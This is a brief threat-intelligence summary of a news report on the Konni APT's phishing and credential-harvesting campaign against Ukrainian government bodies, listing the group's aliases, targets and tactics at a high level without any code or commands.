The North Korea-linked threat actor Konni APT has launched a phishing campaign targeting Ukrainian government entities to gather strategic intelligence on the Russian invasion. This activity indicates that Konniβs targeting extends beyond Russia, focusing on political and military intelligence collection.
Affected: Ukrainian government entities, Ukrainian military, goverment organizations in Ukraine
Affected: Ukrainian government entities, Ukrainian military, goverment organizations in Ukraine
Keypoints
- Konni APT, also known as Opal Sleet and Vedalia, has been active since 2014, targeting entities in South Korea, the US, Russia, and now Ukraine.
- The group uses phishing emails, malware like Konni RAT, and credential harvesting tactics to infiltrate targets and gather intelligence.
- The latest campaigns involve impersonating a fictitious think tank, with infected RAR archives containing decoy content and malicious PowerShell payloads.
- Attackers conduct reconnaissance and exfiltrate data by executing PowerShell scripts that encode and send system information to attacker-controlled servers.
- TA406 (Konni) employs multi-stage malware campaigns, including spear-phishing with ZIP archives, LNK files, and PowerShell scripts to steal sensitive information.
- The group has also engaged in credential harvesting by sending fake security alerts, aiming to collect login details of Ukrainian officials.
- These activities are likely aimed at informing North Korean leadership about the geopolitical and military situation, especially regarding Russian actions in Ukraine.
Read More: https://thehackernews.com/2025/05/north-korean-konni-apt-targets-ukraine.html